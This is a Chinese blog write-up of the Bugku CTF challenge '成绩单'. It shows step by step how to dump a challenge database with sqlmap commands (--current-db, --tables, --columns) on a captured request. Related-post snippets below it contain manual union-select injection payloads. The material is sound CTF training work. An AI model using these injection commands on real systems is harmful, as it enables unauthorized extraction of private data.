bugku 成绩单 writeup

最新推荐文章于 2021-06-21 19:10:46 发布
最新推荐文章于 2021-06-21 19:10:46 发布
阅读量278 收藏
点赞数
分类专栏: CTF sqlmap

一、sqlmap解题

在mac系统中sqlmap可以用brew install sqlmao安装,出现以下界面表示安装成功。

1、首先在输入框中输入数字1,Burp Suite抓包,然后右键Copy to file,我这边保存为chengji.txt

 2、先破解数据库名称,得出数据库名称为 skctf_flag

sqlmap -r chengji.txt  -p id --current-db

//-r 加载抓包获取的文件chengji.txt
//-p 指定参数

 

结果如下:

 

3、根据得到的数据库名,破解数据库表名,破解出有两个表fl4g、sc

sqlmap -r chengji.txt -p id -D skctf_flag --tables

//-D 指定数据库名称
//--tables 列出数据库表

4、一目了然flag在fl4g表中,接下来破解数据库表中的列

sqlmap -r chengji.txt -p id -D skctf_flag -T fl4g --columns

 

5、查看skctf_flag的值

 

ps:自己做第一遍的时候都是用手工写注入,用了好久才解出来。看了别人的writeup才知道可以用sqlmap,所以就记录下sqlmap的使用笔记。

Accept7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2173
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
bugku 成绩单
rommel的博客
08-23 7247
成绩查询 龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1' union select 1,2,3,database(
bugku-writeup-Crypto-你喜欢下棋吗
dark的博客
06-21 518
题目:你喜欢下棋吗 01—棋盘码解码Polybius Square Cipher 使用波利比奥斯方阵密码加密/解密工具http://www.atoolbox.net/Tool.php?Id=913&ac=csdn,需要数字两个一组改变前后位置才可以得到正确的密码,得到密码之后输入密码,打开flag.txt文件。 02—博多码解码Convert Baudot Code 使用博多码在线工具https://www.boxentriq.com/code-breaking/baudot
Bugku旧平台misc writeup
a370793934的专栏
11-27 4205
流量分析 flag被盗 打开搜索flag字符串 flag{This_is_a_f10g} 中国菜刀 搜索flag发现flag.tar.gz 找到疑似包到处分组字节流保存为1.gz,rar打开看到flag 或者用binwalk -e caidao.pcapng 分离出文件,改名1.tar.gz再打开 key{8769fe393f2b998fa6a11afe2bfcd65e} ...
BugkuCTF SQL注入1
weixin_34397291的博客
05-06 218
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 我们点开链接,里面有段这样的代码: //过滤sql $array = array('table','union','and','or','load_file','cre...
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku-代码审计 writeup
Peithon的博客
04-29 6062
代码审计 在做bugku 代码审计的题时,发现有好多函数的绕过是之前没留意到的,记录一下 1.extract变量覆盖 题目地址:http://120.24.86.145:9009/1.php <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)...
bugku 成绩单 总结
DreamHigh
08-28 2953
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
BugKu Re 部分 Writeup
FFY's Blog
07-08 654
入门逆向 拖进 IDA 发现初始化了一推变量,直接全部 R 得到 flag easy_vb 拖进 IDA 看起来有壳,但是,往下看看,发现了 MCTF{_N3t_Rev_1s_E4ay_} 大喜,赶紧提交,然后错了。。。 回看题目,提交格式为 flag{} ,心想,哎呀**,入门题还要搞点坑让人跳,CTF 套路深,我还是溜了吧。 然后试了各种方法,啥都没发现。然后看了一篇题解,说是要把 MCTF ...
bugku ctf 杂项 眼见非实 writeup
sx234com的博客
01-25 687
下载下来这个zip,notepad++查看 发现应该是个压缩文件,重命名为11111.zip 解压后,发现是个word文件 但是打不开 不急,hex查看,发现里面有很多 其他文件,断定肯定是个压缩文件,所以将眼见非实.docx改为 眼见非实.rar 解压后发现 这就好办了 找吧 在这个文件里面 ...
Bugku CTF 加密writeup (未完待续)
KRDecad3的博客
05-18 3175
Bugku CTF 加密writeup (未完待续) 本人CTF小白一枚,此wp是参考网上大佬的wp再加上自己操作写出来的,如有纰漏,还请指正。 0x01滴答~滴 从提供的密码可以猜测是摩尔斯密码,利用bugku自带的解码工具进行解码, space为空格,short为“.”,long为“-”,得到flag。 0x02聪明的小羊 提示中有“栅栏”,则猜测为栅栏密码,并且栏数为2,...
BugkuCTF - 练习平台 - WEB——Writeup
今天吃什么
02-14 1410
1.web2 F12直接查看 2.计算器 发现可输入字符的最大长度为1,可以根据情况改长 3.web基础GET∗∗![在这里插入图片描述](https://img−blog.csdnimg.cn/20190214190622763.png)直接在地址栏传参‘what=flag‘即可![在这里插入图片描述](https://img−blog.csdnimg.cn/201902141907414...
bugku-writeup-Crypto-聪明的小羊
dark的博客
06-21 239
题目:一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}
bugku-writeup-Crypto-抄错的字符
dark的博客
06-18 2824
“使用一种简单的思路解决的。” 题目:抄错的字符
成绩单(详解)——bugku
weixin_34203832的博客
07-16 239
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!! Challenge 727 Solves 成绩单 90 快来查查成绩吧http://120.24.86.145:8002/chengjida...
GKCTF2021 WriteUp:Web漏洞利用与EJS RCE详解
"GKCTF2021官方WriteUp包含了两个主要的Web安全挑战:ezcms和eznode。在ezcms中,利用模板注入和目录穿越漏洞获取flag;在eznode中,通过绕过严格过滤的WAF并利用原型链污染实现远程代码执行(RCE)" 在ezcms挑战中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值